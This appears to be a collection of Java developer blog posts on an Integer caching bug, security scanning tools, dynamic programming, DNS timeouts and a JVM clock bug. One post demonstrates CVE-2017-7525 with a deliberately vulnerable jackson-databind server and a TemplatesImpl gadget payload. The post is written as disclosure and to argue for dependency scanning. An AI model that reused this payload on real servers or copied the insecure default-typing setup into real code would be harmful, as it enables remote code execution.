In Java, is 2019 equal to 2019? Not always!

So, an interesting thing happened today and I wanted to let you know about it. I had an old piece of code that was comparing two integer values, expressed as strings. We used it to evaluate semantic versions at Meterian, comparing the major/minor/patch values of a component version. It never had problems, always worked like a champ, and it looked something like this:

if (Integer.valueOf(elem1) != Integer.valueOf(elem2)) {
    ... // something something

I also had a weird bug report opened by one of my customers telling me that the version comparisons were not working correctly for certain .NET packages, like this one, where versions are something like this:


That piece of code had been working for more than 4 years! What’s going on here? Wait… valueOf? I had a strong suspicion, but I wrote a simple snippet to prove it:

public static void main(String[] args) {
    String[] values = {"9", "99", "127", "128", "2019"};
    for (String value : values) {
        boolean equal = (Integer.valueOf(value) == Integer.valueOf(value));
        System.out.printf("Is %s equal to itself? %s %n", value, equal ? "YES" : "NO?");
    }
}

And this is the output to enjoy!

Is 9 equal to itself? YES
Is 99 equal to itself? YES
Is 127 equal to itself? YES
Is 128 equal to itself? NO?
Is 2019 equal to itself? NO?

Ah! So what’s going on here? Well, as some of you suspected, the valueOf() method of Integer returns not a primitive int but an Integer object. Like any object, comparing it with the “==” operator checks identity, not value. But that method is also a factory, one that caches the Integer instances from -128 to 127 (the upper bound can be raised with the -XX:AutoBoxCacheMax JVM flag): those numbers are effectively represented by the same object instances, and that’s the reason the code usually works. We just needed a .NET guy who uses the number 2019 (a year) as the major version of a semantic version :)

The obvious fix for this bug is to use Integer::parseInt that instead returns a primitive int value:

if (Integer.parseInt(elem1) != Integer.parseInt(elem2)) {
    ... // something something something
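Alternatively, if you want to keep working with Integer objects, comparing them with equals() is also safe. A quick standalone sketch contrasting the three options (not part of the original fix):

```java
public class IntegerComparison {
    public static void main(String[] args) {
        String elem1 = "2019";
        String elem2 = "2019";

        // identity comparison on boxed values: unreliable outside the cache range
        System.out.println(Integer.valueOf(elem1) == Integer.valueOf(elem2));      // false with default JVM settings

        // value comparison on primitives: always correct
        System.out.println(Integer.parseInt(elem1) == Integer.parseInt(elem2));    // true

        // value comparison on boxed objects via equals(): always correct
        System.out.println(Integer.valueOf(elem1).equals(Integer.valueOf(elem2))); // true
    }
}
```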

But hey, this was a story worth blogging about! Happy coding everybody!


Hi all, this is just a placeholder for my recent presentation at Geecon 2019. This is an upgraded version of the previous speech at IMWorld/Bucharest.

Please check my previous blog post to access the full descriptions of the demonstration. Enjoy!

IMWorld Bucharest

I’ve just had the great pleasure to present again in Bucharest at this year’s IMWorld an introduction to security tools. We had some WiFi issues, so I had to slightly change the workshop contents, but the audience was very sympathetic and overall we were all pleased with the results!

As the slides cover only the introduction to the topic, I will detail the workshop contents here so that you can replay what we did live!


SIS tools (Sensitive Information Scanners) are used to examine your codebase for the presence of information that should not be disclosed, like AWS or PGP keys.



Let’s start having a look at git-leaks. You can download the binary from here, unpack it and check it works with the command:

gitleaks-linux-amd64 --help

As you can see there are a lot of options, including for example the ability to run it against an entire organization, but for now run the command against a sample repository:

gitleaks-linux-amd64 --repo=

As you can see it is reporting problems: launch it again with --verbose and a few problems pop up (what about those AWS keys???); you can also add --report=report.csv --csv to generate a CSV report.

Now, why don’t you look at one of your OWN repositories? You could be surprised! Or try this one:

gitleaks-linux-amd64 --repo= --verbose



trufflehog is a Python tool, so it’s extremely easy to install if you are on Linux! Just type:

sudo pip install trufflehog

You can check it works with:

trufflehog --help

There’s a lot you can do here: you can have the output in JSON, you can define extra rules, and so on. It deserves a bit of experimenting! But for the time being, please run it on the first repository:

trufflehog --regex

Again, we can see the AWS keys popping up (oops!). Now, try one of your repos, or maybe this one:

trufflehog --regex --entropy=False



Due to the slightly more complicated installation, we won’t have a look at these ones, but I suggest you check them out as well:

  • gitrob: very comprehensive analysis
  • git-secrets: a git hook provided directly by AWS



SDA tools (Sensitive Dependency Analysis), also known as SCAN (Software Composition ANalysis), are used to examine the software components you use in order to check whether any of them is affected by known vulnerabilities. Here I will gently (and shamelessly) plug the tool my startup is building, Meterian, and I hope you do not mind :)



Download the latest client from the website and run it against a sample project (you can use the one we used in the previous blog post):

cd /your/project/folder
java -jar /path/to/meterian-cli.jar

You will probably be asked to authenticate; just use your GitHub or Google account to do so. You will see some scores (the security one will be, well, very low!) and a report will be generated: just click on the link to access it (again, same social login). If you used my example, jackson-databind 2.8.8 is definitely a winner! It’s potentially exposing your project to at least four different exploits… nice!

You can also see a list of possible upgrades for your libraries and (if the feature is enabled for your account) also the full list of components and the related versions.



Download the client from the website, following the link from GitHub, into a folder, and run it against the same project used before:

cd /your/project/folder
dependency-check/bin/ --project sample --scan .

The first run may trigger the long NVD database download, which takes a while! Just have a coffee or something, come back in 10 minutes, and you will then find an HTML report in the folder:


Just open the report with a browser, you will see a list of the offending libraries.


SCA tools (Software Code Analysis) are used to examine the code you write, either in binary or source format.



Download and unpack the tool, then set the SPOTBUGS_HOME variable:

export SPOTBUGS_HOME=/path/to/spotbugs-3.1.3

Spotbugs has a UI (of course it also works from the command line): launch the UI for a quick demo:

java -jar $SPOTBUGS_HOME/lib/spotbugs.jar

Get some code on your laptop (I suggest the fastjson project, as it has a wide attack surface): create a new project, select the binary output of the project (you may need to run mvn package on the project to get it) and also select the source code. Click the analyze button and then dig into the problems: you have a lot to get through!

Spotbugs has a nice plugin, findsecbugs, that specifically finds security problems: once you have downloaded the plugin, copy the jar file into the plugin folder of Spotbugs:

cp findsecbugs-plugin-1.8.0.jar $SPOTBUGS_HOME/plugin/

Open Spotbugs again, re-run the analysis and enjoy a tour of the new “Security” section!


Download and unpack the tool, then from the newly created folder run it against the sample project:

bin/ pmd -f text -d /path/to/project -R rulesets/java/quickstart.xml

There are a number of rules here; enjoy some time investigating them!


This can only be used as a plugin tool, but it’s pretty effective! Clone the repository:

git clone

Or just download the zip:

wget && unzip

Move to /examples, change the pom.xml so that it references version 3.2.1 of Error Prone, and run:

mvn clean package

Notice that the build stops with an error (the exception not thrown) plus a suggestion: fix the errors one by one and see the compilation pass :).
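For reference, wiring Error Prone into a Maven build is typically done through the compiler plugin; a sketch of the relevant pom.xml fragment (the plugin coordinates and the Error Prone version here are assumptions, check the official docs for your setup):

```xml
<plugin>
  <groupId>org.apache.maven.plugins</groupId>
  <artifactId>maven-compiler-plugin</artifactId>
  <configuration>
    <compilerArgs>
      <arg>-XDcompilePolicy=simple</arg>
      <arg>-Xplugin:ErrorProne</arg>
    </compilerArgs>
    <annotationProcessorPaths>
      <path>
        <groupId>com.google.errorprone</groupId>
        <artifactId>error_prone_core</artifactId>
        <version>2.3.1</version>
      </path>
    </annotationProcessorPaths>
  </configuration>
</plugin>
```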


This is the last category of tools we will see today, and it’s quite an interesting one. RASP tools basically meld into your code, deploying an agent within it (typically using code instrumentation), and they actively track any malicious activity: when that happens, the tool takes preventive measures (e.g. stopping the user session) and reports the issue back to your company’s risk assessment system.


This is an open source tool by Baidu that shows an interesting take on the problem.

Download a fresh Tomcat from here, unpack it and start Tomcat the usual way:

cd apache-tomcat-8.5.6/
bin/ run

Access and see Tomcat working!

Clone the test cases from here, move into the subfolder java/vulns and create the war package:

mvn package

Copy the newly created package under the /webapps subfolder of Tomcat: the server will promptly hot-deploy the application.

cp openrasp-testcases/java/vulns/target/vulns.war apache-tomcat-8.5.6/webapps/

Visit to see the application page (you may need Google Translate at this point to get a bit of English!) and try exploits 002 and 004.2: see how easy it is to bypass security and execute commands on the server.

Now, download the 0.31 Java OpenRASP from here, unpack it and install it on Tomcat:

java -jar RaspInstall.jar -install /path/to/apache-tomcat-8.5.6

Now restart Tomcat: you will see the OpenRASP logo in the console. Start tailing the OpenRASP log:

tail -f /path/to/apache-tomcat-8.5.6/rasp/logs/alarm/alarm.log

Try again to execute the vulnerabilities and… surprise!

  1. you are blocked with a fancy page :)
  2. the logs show the intrusion with complete detail

Hope you enjoy it!


Are you using an opensource library? There’s a good chance you are vulnerable…

This is the talk I presented yesterday at Codemotion Rome 2018! Awesome conference and people, cannot wait for the next one!

You can find a detailed technical explanation in my previous blog post, and you can also have access to the code on GitHub to reproduce the exploit yourself.

Do not underestimate your problem, and put the correct procedure in place: you do not want to be the next Equifax.


Remotely execute Java code using JSON


How difficult is it to exploit a vulnerability in a common Java library in order to remotely execute Java code on a remote server and successfully take control over it? Not much, really. In this article we will demonstrate how to do that using CVE-2017-7525, a well-known vulnerability in jackson-databind, a widely used library to serialize and deserialize JSON, which is also part of the spring-boot stack.

The sample code.

As we all know, serializing and deserializing JSON messages is a very common task, especially in modern microservices REST-based applications: almost every time an API is called, a JSON message is sent to the server to be transformed into a Java object. Because of a stream of deserialization vulnerabilities in jackson-databind, it’s now possible to write simple exploits to gain access to unpatched servers when polymorphic type handling is enabled.

In order to clearly explain the concepts, we introduce here a simple server that handles products with two REST APIs, one to get the list of products and one to add a new product (all the code is available on GitHub). Please note that this is just a sample: we want to provide you with a simple and understandable piece of code, and by no means can it be classified (we hope!) as production code.

A sample of our Product class, which holds some basic product information:

public class Product {

    private int id;
    private String name;
    private String description;
    private Object data;

    protected Product() {
    }

    // constructor, getters and duplicate() omitted for brevity
}

Our ProductsDatabase class, just a glorified HashMap:

public class ProductsDatabase {

  private Map<String, Product> products = new HashMap<>();
  private AtomicInteger idGenerator = new AtomicInteger(0);

  public ProductsDatabase() {
     add(new Product(0, "apple", "Real apple from Italy", randomData()));
     add(new Product(0, "orange", "Real orange from Italy", randomData()));
     add(new Product(0, "kiwi", "Real kiwi from Italy", randomData()));
  }

  public Collection<Product> list() {
    return Collections.unmodifiableCollection(products.values());
  }

  public Product add(Product newProduct) {
    Integer newId = idGenerator.incrementAndGet();
    Product product = newProduct.duplicate(newId);
    products.put(newId.toString(), product);
    return product;
  }
}

Our simple server, written with SparkJava:

public class Main {

  private static ProductsDatabase products = new ProductsDatabase();
  private static ObjectMapper deserializer = new ObjectMapper().enableDefaultTyping();
  private static ObjectMapper serializer = new ObjectMapper();

  public static void main(String[] args) {

    // GET list all products
    get("/products", (request, response) -> {
      Collection<Product> res = products.list();
      return serializer.writeValueAsString(res);
    });

    // POST add new product
    post("/products", (request, response) -> {
      Product received = deserializer.readValue(request.body(), Product.class);
      // return the stored product to the caller
      return serializer.writeValueAsString(products.add(received));
    });
  }
}
You can add a product to the database with a simple curl call with a JSON body containing the new product data:

curl -i -X POST -d '{"name":"melon","description":"Real melon from Italy", "data":["java.util.HashMap",{"cost":2,"color":"yellow"}]}' http://localhost:8888/products

The exploit.

In order to exploit the vulnerability we need a vector. On this occasion we decided to use Apache Xalan, a common XSLT library whose classes are also embedded in the JDK (which, until version 8u45, could be used as the vector in the same way Xalan is used here). Please note that a lot of other attack vectors are available, but for the sake of simplicity we will focus on a very specific one.

We will use a particular class from Xalan which is capable of deserializing an encoded class file from an XML and dynamically creating an instance of that class: we will craft a JSON message that contains the encoded version of our exploit class:

public class Exploit extends org.apache.xalan.xsltc.runtime.AbstractTranslet {

  public Exploit() throws Exception {
    System.err.println("Your server has been compromised!");
  }

  public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
  }

  public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
  }
}

We just need to compile this source code into a .class file, encode it in Base64 and prepare our evil JSON message:

{
  "name": "fakeapple",
  "description": "Fake fruit from UK",
  "data": ["org.apache.xalan.xsltc.trax.TemplatesImpl", {
    "transletBytecodes": ["...the Base64-encoded Exploit.class..."],
    "transletName": "oops!",
    "outputProperties": {}
  }]
}

After sending the message to the server as a normal “add product” request, the encoded class will be instantiated by the Xalan TemplatesImpl class in order to populate the value of the outputProperties field: as the constructor code runs, the evil code runs as well and the server is compromised. Yes, you might see exceptions on the server, but it’s too late.


This is just an example of the hundreds of exploits currently possible using public vulnerabilities in various open source libraries, and for that reason it’s extremely important that you add to your build pipeline a scanner capable of detecting such a situation and blocking the build. We would kindly invite you to use our simple command line client and avoid future nasty surprises. You do not want to be the next Equifax.

You can reach me at!

Disclaimer: please note that all this information is publicly available on the internet. This is just a summary post from a cybersecurity practitioner and nothing else. The code provided is for research purposes only.
Creative Commons Licence
This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.

Dynamic Programming explained (hopefully)

Okay, so some of you have certainly already heard about Dynamic Programming (DP); this is what I have understood so far, and I am happy to share it with you.


In short, DP is all about ordering your computations in a way that avoids recalculating duplicate work: you have a main problem and a lot of subproblems.

There are two key attributes that a problem must have in order for DP to be applicable: optimal substructure and overlapping subproblems:

  • when a problem has optimal substructure, the optimal solution can be obtained by combining the optimal solutions of its subproblems
  • when a problem has overlapping subproblems, its solution requires solving the same subproblems again and again

Hey, please note that if a problem can be solved by combining optimal solutions of non-overlapping subproblems, then we are in the “divide and conquer” area, where for example merge sort and quicksort lie.

Dynamic Programming is typically implemented using two common techniques, tabulation and memoization:

  • when you solve a DP problem using tabulation you solve it bottom-up, solving all the subproblems first and filling an n-dimensional table: the solution to the original problem is then computed from that table. Because of this, tabulation solves all the subproblems.
  • when you solve a DP problem using memoization you maintain a map of already solved subproblems: you solve the problem top-down, starting from the top problem and recursing into the subproblems. Memoization may pay an overhead due to the recursion, but it does not need to solve all the subproblems.

Please note that in DP you will often use backtracking, which incrementally builds candidates for the solution and then abandons them when it determines that they cannot contribute to the solution.

Some code, please!

Ok, all good. Now where do we go from here? Some code will help :) A typical DP problem is the Fibonacci sequence:

fib(n) = fib(n-1) + fib(n-2)

I guess you can already see the overlapping subproblems and the optimal structure: let’s try to solve this with the most natural solution (I guess), which is a recursion.

    private static int fib(int val) {
        if (val == 0 || val == 1)
            return 1;
        else
            return fib(val - 1) + fib(val - 2);
    }

Ok, cool. It works: result! Pretty inefficient though, as it uses a large amount of stack memory and computes the solution to the same subproblem again and again! For example, to compute fib(5) it will compute fib(2) three times. How can we improve this? Well, memoization comes in handy:

    private static Map<Integer, Integer> cache = new HashMap<Integer, Integer>();

    private static int fib(int val) {
        if (val == 0 || val == 1)
            return 1;
        else {
            Integer res = cache.get(val);
            if (res == null) {
                res = fib(val - 1) + fib(val - 2);
                cache.put(val, res);
            }
            return res;
        }
    }

Ok, this is better. At least we do not recompute the same solution many times, but we still use a lot of stack memory to handle the recursion. And, at the end of the day, we need to compute all the subproblem solutions anyway, don’t we? Why don’t we use tabulation then? If we do so, we can revert to a nice iterative solution!

    private static int fib(int val) {
        if (val == 0 || val == 1)
            return 1;
        int fibs[] = new int[val + 1];
        fibs[0] = 1;
        fibs[1] = 1;
        for (int i = 2; i <= val; i++)
            fibs[i] = fibs[i - 1] + fibs[i - 2];
        return fibs[val];
    }

Ah, that’s better! No more recursion, a plain iterative process going on, just a bit of memory used for our table. But wait… can we do any better? Do we really need the whole table? Can we do better than Dynamic Programming?

    private static int fib(int val) {
        int prev = 1;   // fib(0)
        int curr = 1;   // fib(1)
        for (int i = 2; i <= val; i++) {
            int next = curr + prev;
            prev = curr;
            curr = next;
        }
        return curr;
    }

Oh yeah :) We just need to keep the last two values, n-1 and n-2: job done!

Conclusions (?)

DP was useful to think out the best algorithm; it was instrumental in discovering it. But then we needed that plain old spark of genius that not all of us have (certainly not me!), and some help was very welcome. Still, without DP (and without a bigger spark) we would never have easily found an elegant and efficient O(n) solution: so it helps to know about it. And some problems are really not solvable without DP, so please do not underestimate it!

Let me know if you are interested in this stuff, I can post more :)



Java: no timeout on DNS resolution

Breaking news! I just discovered (well, actually yesterday) that it’s not possible to set a timeout on DNS resolution in Java, which relies on the underlying OS. This is NOT good when you have any shape or form of SLA or QoS: you are basically throwing it out of the window!

I suggest you do something about it. This is the code I pushed on msnos (see code and test here); it basically uses a thread pool and a Future to make the magic happen:

import org.apache.http.conn.DnsResolver;
import org.apache.http.impl.conn.SystemDefaultDnsResolver;

import java.net.InetAddress;
import java.net.UnknownHostException;
import java.util.concurrent.*;

public class DnsResolverWithTimeout implements DnsResolver {

    // fields reconstructed from usage (see the full source on msnos)
    private final ExecutorService executor = Executors.newCachedThreadPool();
    private final DnsResolver systemResolver = new SystemDefaultDnsResolver();
    private final long timeoutInMillis = 5000L;

    public InetAddress[] resolve(final String host) throws UnknownHostException {

        Future<InetAddress[]> result = executor.submit(new Callable<InetAddress[]>() {
            public InetAddress[] call() throws Exception {
                return systemResolver.resolve(host);
            }
        });

        try {
            return result.get(timeoutInMillis, TimeUnit.MILLISECONDS);
        } catch (InterruptedException e) {
            log.warn("Unexpected interruption while resolving host " + host, e);
        } catch (ExecutionException e) {
            log.warn("Unexpected execution exception", e.getCause());
        } catch (TimeoutException e) {
            log.warn("Timeout of {} millis elapsed resolving host {}", timeoutInMillis, host);
        }

        throw new UnknownHostException(host + ": DNS timeout");
    }
}

Of course you can make sure your OS is behaving, but you may not have such a luxury :)
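If you are not using the Apache HttpClient DnsResolver abstraction, the same trick works with the plain JDK lookup; a minimal sketch (class and method names here are mine, not from msnos):

```java
import java.net.InetAddress;
import java.net.UnknownHostException;
import java.util.concurrent.Callable;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.Future;
import java.util.concurrent.TimeUnit;

public class TimedDnsLookup {

    // resolves a host, giving up after the requested timeout
    public static InetAddress[] resolve(final String host, long timeoutInMillis) throws UnknownHostException {
        ExecutorService executor = Executors.newSingleThreadExecutor();
        try {
            Future<InetAddress[]> result = executor.submit(new Callable<InetAddress[]>() {
                public InetAddress[] call() throws Exception {
                    return InetAddress.getAllByName(host);
                }
            });
            return result.get(timeoutInMillis, TimeUnit.MILLISECONDS);
        } catch (Exception any) {
            throw new UnknownHostException(host + ": DNS timeout or failure");
        } finally {
            executor.shutdownNow();
        }
    }

    public static void main(String[] args) throws Exception {
        // localhost resolves without touching the network, so this returns quickly
        System.out.println(resolve("localhost", 2000)[0].getHostAddress());
    }
}
```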

JVM issue: concurrency is affected by changing the date of the system! [part 4]

I am frequently challenged about the seriousness of this bug and the impact it has. It’s not the first time I try to explain that, because this bug affects LockSupport.parkNanos(), it basically spreads like a virus across the whole platform. Let’s see this more practically:

$ grep -r -l "parkNanos" .

Well, it does not look that bad, does it? But uhm… I guess we are missing something… who’s using these classes? And who’s using those classes? And so on, transitively? Omg… I am getting a headache! Almost EVERYTHING is using this! So trust me, you will be affected. Maybe you still don’t believe it, but please remember that this also affects Object.wait(long) and so, transitively, synchronized blocks. Wait… WOOT? Oh yeah :) Lots of fun! Especially when your system, deployed on client premises, starts doing “strange” things and you get called by your (not very happy) support team.
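To make the “everything uses it” point concrete: even a plain timed poll on a bounded queue ends up in LockSupport.parkNanos(), via ReentrantLock and Condition.awaitNanos():

```java
import java.util.concurrent.ArrayBlockingQueue;
import java.util.concurrent.TimeUnit;

public class ParkNanosEverywhere {
    public static void main(String[] args) throws InterruptedException {
        ArrayBlockingQueue<String> queue = new ArrayBlockingQueue<String>(1);

        long start = System.nanoTime();
        // nothing in the queue: this waits via Condition.awaitNanos -> LockSupport.parkNanos
        String value = queue.poll(100, TimeUnit.MILLISECONDS);
        long elapsedMillis = (System.nanoTime() - start) / 1_000_000;

        System.out.println("value=" + value + ", waited ~" + elapsedMillis + "ms");
    }
}
```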

Be aware that this bug is now fixed in JDK 8, and I have no knowledge of any successful backport of it into JDK 7.

See also
The full saga, all the articles I published on the matter:

JVM issue: concurrency is affected by changing the date of the system! [part 3]

I have been asked for further information about the matter, and for that reason I am posting a bit more code here. It’s C++, so be aware of it! For the record, we are looking at the sources of the HotSpot JVM; you can find the source here:

Let’s have a look at the park() function of PlatformEvent, which is used by all the synchronization primitives of the JVM:

int os::PlatformEvent::park(jlong millis) {
   int status;
   struct timespec abst;
   compute_abstime(&abst, millis);

   while (_Event < 0) {
     status = os::Linux::safe_cond_timedwait(_cond, _mutex, &abst);
     if (status != 0 && WorkAroundNPTLTimedWaitHang) {
       pthread_cond_destroy(_cond);
       pthread_cond_init(_cond, NULL);
     }
     assert_status(status == 0 || status == EINTR ||
                   status == ETIME || status == ETIMEDOUT,
                   status, "cond_timedwait");
     if (!FilterSpuriousWakeups) break;                 // previous semantics
     if (status == ETIME || status == ETIMEDOUT) break;
     // We consume and ignore EINTR and spurious wakeups.
   }
   // (rest of the function omitted)
}

Please look at the line where compute_abstime() is called, computing the end time to wait: if you open that function (line 5480) you will notice that it calculates an absolute time based on the wall clock:

   static struct timespec* compute_abstime(timespec* abstime, jlong millis) {

      if (millis < 0)  millis = 0;

      struct timeval now;
      int status = gettimeofday(&now, NULL);
      // (rest of the function omitted)
   }

So the park function will be waiting on an absolute time based on a wall clock, and hence will fail miserably if the wall clock is changed.

The simplest fix, without changing too much code, would be to use CLOCK_MONOTONIC (or CLOCK_MONOTONIC_RAW, even better) to compute the absolute time ( clock_gettime(CLOCK_MONOTONIC, &ts) ) and to check it the same way in the main loop (you can associate any available clock with a pthread_cond_timedwait).

Then, if we really want to stay on the safe side, we should avoid using absolute delays and use relative delays, as the POSIX specs explicitly guarantee that threads waiting on a relative time are not affected by changes to the underlying clock, while with absolute delays the situation is historically “fuzzy”.

Is that complex? It does not look so, at least from the code (I will try to patch it myself for sure), but I surely do not grasp the complexity of the whole HotSpot, so I may fail miserably. It also has to be noted that my C++ skills are kind of dated :)

See also
The full saga, all the articles I published on the matter:

JVM issue: concurrency is affected by changing the date of the system! [part 2]

Based on a lot of questions I received on various mailing lists about the previous post, and in order to make the issue simpler and clearer, I decided to go back to a runnable deliverable (code) that shows the problem. Hope this helps!

This is my PreciousPool class, that handles Precious resources:

import java.text.SimpleDateFormat;
import java.util.ArrayList;
import java.util.Date;
import java.util.List;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.locks.Condition;
import java.util.concurrent.locks.Lock;
import java.util.concurrent.locks.ReentrantLock;

public class PreciousPool {

    public static class Precious {
        private final int id;

        private Precious() {
   = 100 + (int)(Math.random() * 900.0);
        }

        public String toString() {
            return "Precious n." + id;
        }
    }

    private final Lock lock;
    private final Condition ready;
    private final long timeoutInMillis;

    private final List<Precious> preciousLended;
    private final List<Precious> preciousAvailable;

    public PreciousPool(int size, long timeoutInSeconds) {
        this.lock = new ReentrantLock();
        this.ready = lock.newCondition();

        this.timeoutInMillis = 1000L * timeoutInSeconds;
        this.preciousLended = new ArrayList<Precious>();
        this.preciousAvailable = new ArrayList<Precious>();

        for (int i = 0; i < size; i++) {
            preciousAvailable.add(new Precious());
        }
    }

    public Precious obtain() {
        lock.lock();
        try {
            // if no precious are available we wait for the specified timeout (releasing the lock so that others can try)
            if (preciousAvailable.size() == 0) {
                try {
                    ready.await(timeoutInMillis, TimeUnit.MILLISECONDS);
                } catch (InterruptedException e) {
                    throw new RuntimeException("Somebody interrupted me!", e);
                }
            }

            // if a precious is available we unload it and return it to the caller, otherwise null
            if (preciousAvailable.size() > 0) {
                Precious value = preciousAvailable.remove(0);
                preciousLended.add(value);
                return value;
            } else {
                return null;
            }
        } finally {
            lock.unlock();
        }
    }

    public void release(Precious value) {
        lock.lock();
        try {
            if (!preciousLended.remove(value))
                throw new RuntimeException("Element " + value + " was not lended!");

            // if a precious is returned we put it back and signal to anybody waiting
            preciousAvailable.add(value);
            ready.signalAll();
        } finally {
            lock.unlock();
        }
    }

    public static void main(String args[]) {
        final int size = 3;
        final PreciousPool pool = new PreciousPool(size, 5);

        // let's exhaust the pool
        for (int i = 0; i < size; i++)
            dump(pool.obtain());

        // and as we are stubborn we continuously ask for a new one
        while (true) {
            dump(pool.obtain());
        }
    }
    private static void dump(Precious precious) {
        if (precious == null)
            log("I did not get my precious :(");
        else
            log("I did get my precious! " + precious);
    }

    private static void log(String message) {
        final String now = new SimpleDateFormat("HH:mm:ss:SSSS ").format(new Date());
        System.out.println(now + message);
    }
}

So, the main is a single thread (no need for multithreading here, let’s keep it simple) that first exhausts the whole pool and then keeps asking, without success, for a resource. Stubborn guy, I say, but it happens. If you run this program everything works as expected: you are greeted by three successful Precious and then an endless list of failures that continuously grows. All good :)

02:34:40:0061 I did get my precious! Precious n.156
02:34:40:0062 I did get my precious! Precious n.991
02:34:40:0062 I did get my precious! Precious n.953
02:34:45:0064 I did not get my precious!
02:34:50:0065 I did not get my precious!
02:34:55:0066 I did not get my precious!
02:35:00:0067 I did not get my precious!
02:35:05:0068 I did not get my precious!

But guess what happens when, while the program is running, I change the date of my system back by one hour? Everything stops, it’s as simple as that. No prints, nothing, zero, nada. Now, if it wasn’t so late, I would probably wait one hour to see my program restored to its normal processing, but as a customer I wouldn’t be terribly happy :)
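A side note: if your own code needs to measure elapsed time in a way that survives wall-clock changes, use System.nanoTime(), which is designed to measure elapsed time only, instead of System.currentTimeMillis(), which follows the system date:

```java
public class MonotonicTiming {
    public static void main(String[] args) throws InterruptedException {
        // currentTimeMillis() follows the wall clock: it jumps if the system date is changed
        // nanoTime() only measures elapsed time, so it is immune to date changes
        long start = System.nanoTime();
        Thread.sleep(250);
        long elapsedMillis = (System.nanoTime() - start) / 1_000_000;
        System.out.println("slept for ~" + elapsedMillis + "ms");
    }
}
```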

See also
The full saga, all the articles I published on the matter: